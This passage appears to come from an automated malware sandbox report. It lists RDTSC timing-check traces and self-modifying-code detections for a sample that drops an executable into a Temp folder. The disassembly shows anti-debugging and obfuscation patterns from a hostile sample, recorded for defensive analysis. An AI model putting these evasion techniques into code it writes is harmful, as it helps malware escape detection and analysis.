Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BECFF1 second address: BED024 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F9D493C17CCh 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007F9D493C17D8h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BED024 second address: BED031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnc 00007F9D4900D0C6h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BED031 second address: BED062 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F9D493C17C6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F9D493C17CAh 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F9D493C17D4h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BEC079 second address: BEC07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BEEE1F second address: A6DD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 add dword ptr [esp], 06A9CA61h 0x0000000c jng 00007F9D493C17CCh 0x00000012 push dword ptr [ebp+122D142Dh] 0x00000018 pushad 0x00000019 mov al, 18h 0x0000001b mov dword ptr [ebp+122D1CD2h], eax 0x00000021 popad 0x00000022 call dword ptr [ebp+122D1E0Bh] 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D1CD2h], esi 0x0000002f xor eax, eax 0x00000031 je 00007F9D493C17D5h 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jne 00007F9D493C17CCh 0x00000041 mov dword ptr [ebp+122D1CD2h], edx 0x00000047 pushad 0x00000048 mov edx, dword ptr [ebp+122D2B6Eh] 0x0000004e sub cx, 8EC0h 0x00000053 popad 0x00000054 mov dword ptr [ebp+122D2DFAh], eax 0x0000005a jmp 00007F9D493C17D1h 0x0000005f mov dword ptr [ebp+122D1CD2h], eax 0x00000065 mov esi, 0000003Ch 0x0000006a mov dword ptr [ebp+122D1CD2h], ebx 0x00000070 add esi, dword ptr [esp+24h] 0x00000074 cld 0x00000075 jmp 00007F9D493C17CBh 0x0000007a lodsw 0x0000007c mov dword ptr [ebp+122D26FCh], ebx 0x00000082 cmc 0x00000083 add eax, dword ptr [esp+24h] 0x00000087 pushad 0x00000088 mov edi, dword ptr [ebp+122D2E02h] 0x0000008e call 00007F9D493C17D0h 0x00000093 mov cx, di 0x00000096 pop esi 0x00000097 popad 0x00000098 mov ebx, dword ptr [esp+24h] 0x0000009c jmp 00007F9D493C17CCh 0x000000a1 push eax 0x000000a2 pushad 0x000000a3 push edi 0x000000a4 push eax 0x000000a5 push edx 0x000000a6 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BEEE64 second address: BEEE69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BEEE69 second address: BEEF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9D493C17C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F9D493C17C8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a stc 0x0000002b mov dword ptr [ebp+122D2888h], ebx 0x00000031 push 00000000h 0x00000033 jmp 00007F9D493C17D4h 0x00000038 push FAA6665Fh 0x0000003d jmp 00007F9D493C17D1h 0x00000042 add dword ptr [esp], 05599A21h 0x00000049 mov ecx, dword ptr [ebp+122D1C95h] 0x0000004f push 00000003h 0x00000051 mov esi, 50BE6B5Ah 0x00000056 push 00000000h 0x00000058 cld 0x00000059 push 00000003h 0x0000005b mov ecx, 0B174FEDh 0x00000060 push CB0358CDh 0x00000065 jno 00007F9D493C17CEh 0x0000006b xor dword ptr [esp], 0B0358CDh 0x00000072 mov cl, ah 0x00000074 lea ebx, dword ptr [ebp+12454D50h] 0x0000007a mov edi, dword ptr [ebp+122D2DD2h] 0x00000080 sub dword ptr [ebp+122D29DCh], ecx 0x00000086 push eax 0x00000087 push eax 0x00000088 push edx 0x00000089 pushad 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BEEF1D second address: BEEF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D4900D0D6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BEF0F8 second address: BEF14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 nop 0x00000007 add dword ptr [ebp+122D2A78h], esi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F9D493C17C8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 jmp 00007F9D493C17D1h 0x0000002e push 163C0D32h 0x00000033 pushad 0x00000034 pushad 0x00000035 jnc 00007F9D493C17C6h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C0133E second address: C01342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C01342 second address: C0134C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C0E906 second address: C0E90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C0EAC6 second address: C0EAE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D493C17CDh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F9D493C17CCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C0EE07 second address: C0EE2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F9D4900D0C6h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BE4912 second address: BE4918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BE4918 second address: BE4922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9D4900D0C6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C0FBFE second address: C0FC02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C0FC02 second address: C0FC17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F9D4900D0CCh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C0FC17 second address: C0FC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C0FC1D second address: C0FC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C0FC23 second address: C0FC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C101B3 second address: C101B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C101B8 second address: C101D0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9D493C17CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C101D0 second address: C101E8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9D4900D0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F9D4900D0CEh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C101E8 second address: C101F5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9D493C17C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C101F5 second address: C10201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9D4900D0C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C10345 second address: C1034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C105FF second address: C10605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C108AA second address: C108B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9D493C17C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C108B6 second address: C108BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BE13FB second address: BE1404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BE1404 second address: BE1425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F9D4900D0C8h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BE1425 second address: BE1429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BE1429 second address: BE1448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D4900D0CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F9D4900D0CCh 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: BD75EB second address: BD75F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C1BA4D second address: C1BA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C1E91F second address: C1E923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C1E923 second address: C1E929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C1EA17 second address: C1EA1D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C1EA1D second address: C1EA23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C1EE4A second address: C1EE4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C1EE4E second address: C1EE52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C1EE52 second address: C1EE5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C1F39A second address: C1F3A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C21045 second address: C2104A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C21AF9 second address: C21B03 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9D4900D0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C22610 second address: C2262C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9D493C17D2h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C23B4E second address: C23B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C23B5A second address: C23B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C23B63 second address: C23B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C23B67 second address: C23B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C23895 second address: C238A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C245DE second address: C2465F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F9D493C17D7h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F9D493C17C8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov esi, dword ptr [ebp+122D1E0Bh] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F9D493C17C8h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f push edi 0x00000050 jmp 00007F9D493C17D2h 0x00000055 pop edi 0x00000056 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C2465F second address: C24666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C24666 second address: C24677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F9D493C17C6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C24357 second address: C2436A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C24E50 second address: C24E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C24E54 second address: C24E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C24E60 second address: C24E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C26DF3 second address: C26DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C26DF7 second address: C26E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9D493C17CFh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F9D493C17C8h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C2743B second address: C274BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d jmp 00007F9D4900D0D8h 0x00000012 popad 0x00000013 nop 0x00000014 add edi, dword ptr [ebp+122D3A6Ch] 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+12453C69h], ecx 0x00000022 push 00000000h 0x00000024 call 00007F9D4900D0D9h 0x00000029 mov bx, si 0x0000002c pop ebx 0x0000002d sbb ebx, 3F99BC57h 0x00000033 xchg eax, esi 0x00000034 jmp 00007F9D4900D0CEh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F9D4900D0D5h 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C274BE second address: C274C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C274C4 second address: C274C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C28522 second address: C28527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C28527 second address: C28531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F9D4900D0C6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	RDTSC instruction interceptor: First address: C28531 second address: C285CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F9D493C17C8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 call 00007F9D493C17D3h 0x0000002a mov bx, 5C71h 0x0000002e pop ebx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F9D493C17C8h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b mov edi, dword ptr [ebp+122D3C1Eh] 0x00000051 jmp 00007F9D493C17D5h 0x00000056 push 00000000h 0x00000058 jmp 00007F9D493C17D8h 0x0000005d xchg eax, esi 0x0000005e push edx 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D8EF34 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F4264D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F42A40 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: FD27CC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Special instruction interceptor: First address: A6DD76 instructions caused by: Self-modifying code
